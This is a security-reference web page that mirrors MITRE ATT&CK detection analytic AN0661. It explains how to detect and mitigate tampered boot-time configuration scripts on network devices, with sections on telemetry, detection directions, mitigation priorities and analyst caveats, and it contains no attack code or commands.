AN0661: Analytic 0661
Detection of modified boot-time configuration scripts that persist malicious CLI commands across reboots.
Analyst context for executives and security teams
This analytic matters because boot-time configuration scripts on network devices can turn a one-time compromise into persistent access that survives reboots. For executives and security leaders, the practical issue is resilience: if routers, switches, firewalls, or other network devices can restart into a malicious state, recovery plans and change-control evidence may be unreliable unless those startup scripts are monitored and validated.
Executive priority
Prioritize this as a network infrastructure integrity and incident recovery control. Leaders should ask whether critical network devices have known-good boot-time configuration baselines, whether unauthorized changes are logged and reviewed, and whether incident response playbooks include validation of startup scripts before returning devices to service. This supports business continuity, auditability of network change management, and confidence that a reboot or replacement action actually removes persistence.
Technical view
The supplied ATT&CK object is a detection analytic for Network Devices focused on identifying modified boot-time configuration scripts that persist malicious CLI commands across reboots. SOC, detection engineering, and IR teams should validate whether they can compare current boot-time scripts or startup configuration artifacts against approved baselines, correlate changes with authorized maintenance activity, and investigate unexpected CLI commands that would execute after reboot. Because no official detection logic is provided, implementation must be environment-specific and based on available device telemetry, configuration archives, and change-management records.
Likely telemetry
- Network device configuration backups and startup configuration snapshots
- Boot-time or startup script contents where the platform exposes them
- Configuration change logs from network devices
- Administrative CLI command history where available
- AAA, TACACS/RADIUS, or device login records tied to configuration changes
Detection direction
- Establish known-good baselines for boot-time configuration scripts and compare new or current versions for unauthorized modifications.
- Alert on changes to startup or boot-time script locations that are not linked to approved maintenance activity.
- Review added CLI commands for persistence behavior, especially commands that would execute automatically after reboot.
- Correlate configuration changes with administrator identity, source address, time window, and change ticket to reduce false positives from legitimate operations.
- Validate coverage on Network Devices specifically; endpoint or server-focused logging will not prove visibility for this analytic.
Mitigation priorities
- Define and maintain approved baselines for network device boot-time scripts and startup configurations.
- Restrict who can modify network device startup configuration artifacts and require authenticated, attributable administrative access.
- Centralize configuration backups, change logs, and administrative access records for audit and investigation.
- Integrate network device changes with formal change management so detections can distinguish approved maintenance from suspicious modification.
- Include boot-time script and startup configuration review in network device incident response and recovery procedures before declaring eradication complete.
Analyst notes and limits
This object is an ATT&CK detection analytic, not a technique entry. It provides a concise detection purpose but no official detection query, tactic mapping, or relationship context. The strongest use is as a control-validation prompt for network infrastructure monitoring: can the organization prove whether boot-time configuration scripts changed, who changed them, and whether the changes persist across reboot?
The official detection field is not provided, tactics are not specified, and no relationships are supplied. This take therefore avoids claims about specific adversaries, active exploitation, exact detection logic, or guaranteed coverage. Local device types, operating systems, configuration storage behavior, and logging capabilities are required to implement and validate this analytic.
Analytic 0661
Detection of modified boot-time configuration scripts that persist malicious CLI commands across reboots.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 010efc082251… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
mitre-attack AN0661Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.